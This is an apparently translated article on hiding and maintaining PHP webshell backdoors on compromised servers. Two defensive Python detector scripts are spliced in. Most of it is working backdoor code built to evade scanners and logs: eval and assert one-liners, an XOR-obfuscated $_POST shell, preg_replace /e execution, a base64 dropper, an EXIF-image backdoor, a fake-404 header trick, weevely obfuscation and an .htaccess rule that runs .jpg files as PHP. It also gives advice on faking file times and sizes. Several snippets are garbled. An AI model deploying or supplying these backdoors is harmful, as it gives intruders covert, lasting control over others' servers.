PHP backdoor hiding and maintenance techniques

After a successful test, you usually want to keep your privileges for longer, so the work of leaving backdoors is crucial. The backdoors usually deployed include, but are not limited to, database permissions, web permissions, system user permissions and so on. This article introduces some of the ideas behind popular backdoor hiding.


0×00 Preface

After a successful test, you usually want to keep your privileges for longer, so the work of leaving backdoors is very important. The backdoors usually deployed include, but are not limited to, database permissions, web permissions, system user permissions and so on. This article introduces some of the ideas behind popular backdoor hiding.

This piece takes a PHP web backdoor as its example, offered in the hope of drawing out better ideas from others.

The most common one-sentence backdoor may be written like this

    <?php eval($_POST['cmd']);?>

or like this

    $_POST['cmd']);?>

Of course, these differ only in the function called. For the functions PHP has disabled, look at disable_functions in php.ini.

But operations staff have many ways to spot our shell intuitively. For example:

◆ Anomalies are found through the file name, modification time or size, or by comparing against a file backup

◆ It is found by a webshell backdoor scanning script such as Scanbackdoor.php, Pecker or shelldetect.php, or by various scanners

◆ The location of the backdoor is found in the access.log access log

◆ Or our test request is blocked by the WAF, leaving a warning log, and so on

In view of these common detection methods, the following seven common techniques for hiding a shell are summarized

0×01 circumvention

Look at the code of the various backdoor scanners and you will see that leaving a keyword that everyone knows and everyone shouts about is absolutely not acceptable in a shell

Common keywords include:

◆ System command execution: system, passthru, shell_exec, exec, popen, proc_open

◆ Code execution: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

◆ File inclusion and file writing: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

In the past, a friend cleverly used $_POST[0]($_POST[1]) to execute commands. Unfortunately, it is now hard to escape the scanners with that, but everything changes, and construction methods are endless

tudouya gave a construction technique on FreeBuf (http://www.freebuf.com/articles/web/33824.html), using

    <?php
    @$_++; // $_ = 1
    $__=("#"^"|"); // $__ = _
    $__.=("."^"~"); // _P
    $__.=("/"^"`"); // _PO
    $__.=("|"^"/"); // _POS
    $__.=("{"^"/"); // _POST
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
    ?>

Generated by construction; of course, if that seems too obvious, you can also write it like this

    <?php $_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$__}[!$_](${$__}[$_]);?>

The code is disguised, and a simple "anti-kill" shell sample appears. It executes correctly and bypasses ordinary scanners, and you can also rely on it to write a new temporary shell.

0×02 feature

Executing commands with the help of syntax features is also an interesting way. It borrows PHP's behaviour when processing variables: PHP checks whether the data inside double quotes contains variables (and parses their values), e.g.:

    ${@eval(phpinfo())}

{} lets PHP parse the variable content inside double quotes, and @ suppresses the error so that execution continues
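A defender-side counterpart, added here as an example and not part of the original article: a small Python script that undoes the XOR-and-concatenate construction from 0×01 to recover the hidden _POST keyword, and flags the ${$var}[...](...) call and the ${...} double-quote interpolation from 0×02. The sample source it scans is constructed, and the rule names are my own.

```python
import re

# Constructed sample (not from the page): the XOR-built one-liner from 0x01 next to
# the "${...}" double-quote interpolation trick from 0x02.
SAMPLE = r'''<?php
$_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$__}[!$_](${$__}[$_]);
$msg = "${@eval(phpinfo())}";
?>'''

SUPERGLOBALS = {"_GET", "_POST", "_REQUEST", "_COOKIE", "_SERVER", "_FILES"}
# ("x"^"y") on single-character literals: PHP XORs strings byte by byte.
XOR_LIT = re.compile(r'\(\s*"([^"\\])"\s*\^\s*"([^"\\])"\s*\)')
# Two adjacent literals joined with "." (folded repeatedly until stable).
CONCAT = re.compile(r'"([^"\\]*)"\s*\.\s*"([^"\\]*)"')
# A double-quoted string containing ${ ...( ... ) } on one line: PHP runs that code.
CURLY = re.compile(r'"[^"\n]*\$\{[^"\n]*\([^"\n]*\)[^"\n]*\}[^"\n]*"')
# ${$name}[...](...): a variable-variable used as the function to call.
VARFUNC = re.compile(r'\$\{\$\w+\}\s*\[[^\]]*\]\s*\(')

def resolve_xor(src: str) -> str:
    """Replace every ("a"^"b") with the literal it evaluates to."""
    return XOR_LIT.sub(lambda m: '"%s"' % chr(ord(m.group(1)) ^ ord(m.group(2))), src)

def fold_concat(src: str) -> str:
    """Join "a"."b" chains into one literal so a hidden keyword reads whole."""
    prev = None
    while prev != src:
        prev, src = src, CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), src)
    return src

def recover_strings(src: str) -> list:
    """String literals that remain once XOR pairs are resolved and folded."""
    return re.findall(r'"([^"\\]*)"', fold_concat(resolve_xor(src)))

def scan(src: str) -> list:
    """(rule, evidence) findings for the two constructions this page describes."""
    hits = []
    for s in recover_strings(src):
        if s in SUPERGLOBALS:          # $_POST spelled out of XOR/concat pieces
            hits.append(("superglobal-built-from-literals", s))
    hits += [("variable-variable-call", m.group(0)) for m in VARFUNC.finditer(src)]
    hits += [("curly-interpolation-call", m.group(0)) for m in CURLY.finditer(src)]
    return hits

if __name__ == "__main__":
    for rule, evidence in scan(SAMPLE):
        print(f"{rule:32} {evidence}")
```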

Then you can start constructing the hidden backdoor, but here the construction relies on command execution caused by a function, and yes, that function is preg_replace

    <?php preg_replace("//e", $_POST['cmd'], "");?>

This method has obviously been entered into scanner blacklists, so modify it slightly

    <?php
    function funfunc($str){}
    echo preg_replace("/(.+?)/ies", 'funfunc("1")', $_POST["cmd"]);
    ?>

It executed and was not detected. The way it executes is obvious: after the regular expression matches, {${phpinfo()}} is passed into funfunc and causes code execution

    funfunc("{${phpinfo()}}")

Another method

    "$arr="".$_GET['cmd']."";");?>

0×03 inclusion

Everyone has tried file inclusion in every way, but there are techniques for inclusion too. Ordinary file inclusion may simply be an include of some txt or jpg, or even directly leaving an include vulnerability, but a scanner finds that easily, and the extra included files are easy to find as well.

Look at this script

    <?php
    if(@isset($_GET[content])){
        $fp=fopen('README','w');
        file_put_contents('README',"
        @file_put_contents('README',$_GET[content],FILE_APPEND);
        fclose($fp);
        require 'README';
    }?>
This can be regarded as solving a small problem. Unfortunately, because functions such as file_put_contents are too sensitive, they are easily discovered by scanners, so encoding is used to create the shell, which is generated on access.

    <?php fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),w),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));?>

This can evade some scanners, but this pattern also tends to attract attention, so the newly generated file should also be simply hidden to avoid detection. Of course, newer concepts such as heuristics are not considered here. Where this method cannot meet the need, a clever attacker turned to images again

    <?php $exif=exif_read_data('./lol.jpg');preg_replace($exif['Make'],$exif['Model'],'');?>

Reference: A backdoor hidden in the EXIF of JPG images. This time you don't have to simply copy /b to generate the image trojan; using preg_replace to execute specific fields of the file also works. Here you may be prompted with Call to undefined function exif_read_data(); you need to modify php.ini so that extension=php_exif.dll is loaded after extension=php_mbstring.dll.

From the above it can be seen that this image backdoor relies on the preg_replace e modifier, on PHP's variable parsing and execution, and on base64 encoding, and finally relies on file identification to piece together a complete shell. It can be regarded as a small reminder for beginners about hiding backdoors.

Of course, as long as there is an include point, the form of the included file is varied, even the error_log (although you may want to consider turning that off); only the unexpected...

0×04 hiding

To prevent visitors from discovering the existence of the backdoor, clever security researchers will also add some confusion and try to mislead the eye

    (The fake-404 HTML snippet shown at this point did not survive extraction; only the "-//IETF//DTD HTML 2.0//EN" doctype fragment, a body tag and the closing ?> remain.)

With the help of the above HTML rendering, the browsed page has begun to disguise itself as a 404 to confuse the audience

But this cannot avoid visitors or log analysis. To hide better among a large number of logs, construct the following script
    <?php header('HTTP/1.1 404'); ob_start(); @fputs(fopen(base64_decode('cGx1Z2luX20ucGhw'),w),base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));?>

The access is a real 404, and yes, the same is true in the log

But at this moment, the script we want to connect to has been generated in the current directory

0×05 obfuscation

Those who have used the weevely tool will know that the anti-kill shell it generates looks like this

    $penh="sIGpvaW4oYXJyYgiXlfc2xpY2UoJGEsgiJGMoJGEpLTgiMpKSkpgiKTtlY2hvICc8LycgiuJgiGsugiJz4nO30=";
    $kthe="JGEpPjgiMpe yRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn";
    stwrw_wrwepwlwawcwe");
    $zrmt="JGM9J2NvdWgi50JzskgiYT0gikX0NgiPT0tJRgiTtpZihyZXNldCgkYSk9PSgidvbycggiJgiiYgJGMo";
    $smgv=$ftdf("f", "", "bfafsfef6f4_fdfefcodfe");
    $rdwm=$jgfi('', $smgv($ftdf("gi", "", $zrmt.$kthe.$wmmi.$penh)));
    $rdwm();
    ?>

After connecting to the terminal, it looks like this. Ps: I forgot to change the terminal encoding in the screenshot :(
The anti-kill method is to generate randomly named variables in a fixed area, then use str_replace to assemble base64_decode and execute the command. Of course, this is obfuscation at the code level to evade scanners.

The more commonly used methods of obfuscation:

◆ Modify the file time

◆ Rename the file and blend it into the folder where uploaded files live, so that file anomalies cannot be spotted visually

◆ Disguise the file size (at least make the size look like a normal script)

◆ Choose a hiding path that is accessed as little as possible

◆ Abnormal directories, such as a directory named with a %20 space; this one is relatively easy to find

0×06 parsing

Use .htaccess to add a parsing backdoor, such as:

    AddType application/x-httpd-php .jpg

The above is taking weevely as an example
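A defender-side example, added here and not part of the original article: Python that runs three log-based checks over constructed Apache combined-format lines, matching the tricks in 0×04 (a "real" 404 that is still a POST target), 0×05 (a %20 directory) and 0×06 (a .jpg that receives POSTs), plus a check of .htaccess for handler directives that map non-PHP extensions to PHP. The rule names and the sample lines are my own.

```python
import re
from typing import List, Tuple

# Constructed Apache combined-format log lines (not from the page): a normal visitor,
# then a client POSTing to an image, POSTing to a "404", and browsing a %20 directory.
LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /old-page.html HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "POST /images/lol.jpg HTTP/1.1" 200 18 "-" "curl/8.0"
198.51.100.9 - - [10/Oct/2023:13:56:10 +0000] "POST /inc/404.php HTTP/1.1" 404 0 "-" "python-requests/2.31"
198.51.100.9 - - [10/Oct/2023:13:56:15 +0000] "GET /upload/%20/sh.php HTTP/1.1" 200 12 "-" "python-requests/2.31"
"""
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
                  r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')
STATIC_EXT = (".jpg", ".jpeg", ".png", ".gif", ".txt")
PHP_EXT = {".php", ".phtml", ".php5"}

def findings_for(line: str) -> List[Tuple[str, str]]:
    """Rules for one log line, each tied to a hiding trick from the article."""
    m = LINE.match(line)
    if not m:
        return []
    method, path, status = m["method"], m["path"].split("?")[0], int(m["status"])
    hits = []
    if method == "POST" and status == 404:           # 0x04: script answers 404 but still runs
        hits.append(("post-to-404", path))
    if re.search(r"%(20|09|0a|0d)", path, re.I):     # 0x05: "%20" directory hiding
        hits.append(("whitespace-in-path", path))
    if method == "POST" and path.lower().endswith(STATIC_EXT):  # 0x06: .jpg parsed as PHP
        hits.append(("post-to-static-file", path))
    return hits

def scan_log(text: str) -> List[Tuple[str, str]]:
    return [hit for line in text.splitlines() for hit in findings_for(line)]

HANDLER = re.compile(r"^\s*(AddType|AddHandler|SetHandler)\s+(\S+)(.*)$", re.I | re.M)

def risky_htaccess_lines(htaccess: str) -> List[str]:
    """Directives that hand a non-PHP extension to the PHP handler (0x06)."""
    bad = []
    for m in HANDLER.finditer(htaccess):
        directive, target, exts = m.group(1).lower(), m.group(2).lower(), m.group(3).split()
        if "php" not in target:
            continue
        if directive == "sethandler" or any(e.lower() not in PHP_EXT for e in exts):
            bad.append(m.group(0).strip())
    return bad

if __name__ == "__main__":
    for rule, path in scan_log(LOG):
        print(f"{rule:22} {path}")
    print(risky_htaccess_lines("AddType application/x-httpd-php .jpg\n"))
```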
0×07 Mixture

To summarize the above methods, most of them are nothing more than a process of constructing a vulnerability. The code constructed around a vulnerability can be as strange as any backdoor: you can write something delicate and graceful, or you can make it simple and crude, but the situations they suit are different. Integrating these ideas well and constructing your own hidden shell is not difficult. The above is just a summary of experience; if you have interesting ideas, please feel free to share them.

The above introduced PHP backdoor hiding and maintenance techniques and related content. I hope it is helpful to friends interested in PHP tutorials.
